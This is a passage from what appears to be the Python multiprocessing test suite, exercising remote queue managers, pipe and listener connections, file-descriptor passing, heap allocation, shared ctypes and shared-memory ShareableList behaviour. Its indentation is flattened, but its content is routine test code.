QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
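# Registering 'get_queue' without a callable means QueueManager2 can only be
# used by clients connecting to a server that already provides 'get_queue'.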
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
        # Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
            # Close the connection.Listener socket which gets opened as part
            # of manager.get_server().  It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
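# An empty byte string acts as the end-of-stream marker understood by the
# _echo() child process below.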
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)   # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
        # We test that a pipe connection can be closed by the parent
        # process immediately after the child is spawned.  On Windows this
        # sometimes failed on old versions because child_conn would be
        # closed before the child got a chance to duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
    @classmethod
    def _send_data_without_fd(cls, conn):
        os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should have connected, written
        # data and closed the pipe handle by now.  This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA.  See Issue
        # 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
        # Polling may "pull" a message into the child process, but we
        # don't want it to pull only part of a message, as that would
        # corrupt the pipe for any other processes which might later
        # read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
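# Runs in the child process: double every shared ctypes value in place so the
# parent can verify that the updates are visible through the shared memory.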
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
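# Child-process helper: accepts either a segment name (str) or an unpickled
# SharedMemory object, writes binary_data at the start of the buffer, then
# closes its local handle.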
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating a shared memory segment with a negative size must fail.
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching to a shared memory segment without specifying a name must also fail.
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test that the shared memory segment is created properly when
# _make_filename returns the name of an existing shared memory segment.
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX, which can be '/psm_' or 'wnsm_'; this is necessary
# because some POSIX-compliant systems require the name to start with '/'.
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
sms = shared_memory.SharedMemory('test02_tsmap', True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals,
# maintain its connection with the current process, and succeed when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
